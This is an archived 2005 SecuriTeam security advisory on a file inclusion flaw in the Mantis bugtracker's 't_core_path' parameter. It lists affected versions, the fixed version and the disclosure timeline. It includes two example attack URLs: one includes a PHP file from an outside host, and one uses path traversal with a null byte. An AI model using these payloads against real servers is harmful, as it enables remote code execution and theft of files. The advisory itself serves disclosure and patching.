[UNIX] Mantis File Inclusion Vulnerability (t_core_path)

• Previous message: SecuriTeam: "[NEWS] Skype Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 31 Oct 2005 08:53:05 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Mantis File Inclusion Vulnerability (t_core_path)
------------------------------------------------------------------------

SUMMARY

 <http://www.mantisbt.org/> Mantis is "a web-based bugtracking system. It
is written in the PHP scripting language and requires the MySQL database
and a webserver". Mantis is vulnerable to file inclusion vulnerability due
lack of sanitation in bug_sponsorship_list_view_inc.php file.

DETAILS

Vulnerable Systems:
 * Mantis versions 0.19.2 and 1.0.0rc2. (other versions suspected)

Immune Systems:
 * Mantis versions 0.19.3.

Input passed to the "t_core_path" parameter in
"bug_sponsorship_list_view_inc.php" isn't properly verified, before it
used to include files. This can be exploited to include arbitrary files
from external and local resources.

Examples:
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=http://[host]/[file].php?
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../[file]%00

Successful exploitation requires that "register_globals" is enabled (not
recommended setting).

Solution:
Update to Mantis version 0.19.3
 <http://sourceforge.net/project/showfiles.php?group_id=14963>
http://sourceforge.net/project/showfiles.php?group_id=14963

Disclosure Timeline:
19.09.05 - Vulnerability discovered
19.09.05 - Vendor notified
11.10.05 - Vendor issues new version
26.10.05 - Public disclosure

ADDITIONAL INFORMATION

The information has been provided by Andreas Sandblad, Secunia Research.
The original article can be found at:
<http://secunia.com/secunia_research/2005-46/advisory/>
http://secunia.com/secunia_research/2005-46/advisory/

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] Skype Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]